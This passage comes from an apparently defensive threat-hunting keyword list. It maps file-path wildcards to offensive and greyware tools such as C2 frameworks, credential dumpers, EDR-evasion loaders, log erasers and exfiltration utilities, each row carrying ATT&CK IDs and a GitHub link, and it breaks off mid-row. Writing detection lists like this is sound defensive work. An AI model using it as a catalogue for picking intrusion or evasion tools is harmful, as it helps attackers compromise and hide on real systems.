-*\edraser.py*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*\Egress-Assess*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\Ekko.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - 
T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\elevateit.bat*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*\ELF\portscan*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*\ELF\serverscan*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*\Elite.csproj*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*\Elite.sln*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*\emailall.py*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - 
TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*\enc_shellcode.bin*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*\enc_shellcode.h*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*\ES.Alan.Core*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\EternalHushCore.dll*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*\EternalHushCore\*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*\etw-fuck.cpp*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*\etw-fuck.exe*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*\ETWHash.*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*\EventViewer-UACBypass*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,0,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*\evil.dll*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*\evil.dll*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*\evil_pdf\*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\EvilClippy*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*\evilclippy.cs*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,0,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*\EvilnoVNC*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,0,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*\evilSignatures.db*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*\exe_to_dll\*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/hasherezade/exe_to_dll,1,0,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*\Exegol-*.zip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\exegol.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\Exegol-images-*.zip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\Exegol-images-*\*docker*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\exfiltrate.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation 
tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*\ExternalC2\*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*\FakeCmdLine*,offensive_tool_keyword,FakeCmdLine,Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.,T1059 - T1036,TA0003,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/FakeCmdLine,1,0,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\Fertliser.exe*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*\Fertliser.pdb*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*\Files\ContainersFileUrls.txt*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,0,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*\follina.py*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,1,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*\FreeFileSync.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\FreeFileSync\Logs\*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\FreeFileSync_*_Windows_Setup.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\FreeFileSyncPortable_*.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - 
T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\freeze.go,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,1,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*\FtpC2\*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,0,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*\FudgeC2*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*\GetBrowsers.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\Get-SpoolStatus.ps1*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential 
Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*\GetWebDAVStatus\,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,0,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*\GetWebDAVStatus_x64*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,0,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*\glit.exe*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*\glit-cli*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*\gmailC2.exe*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*\gocrack-1.0.zip*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*\gocrack-master.*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential 
Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*\GodFault.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*\Godpotato\*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,0,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*\GoFetchLog.log*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*\GoodSync-2*-*.log*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\GoodSync-vsub-Setup.exe*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data 
Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\go-secdump*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,0,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*\goZulipC2*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,0,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*\GPOddity\*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*\Group3r.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*\Grouper2.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
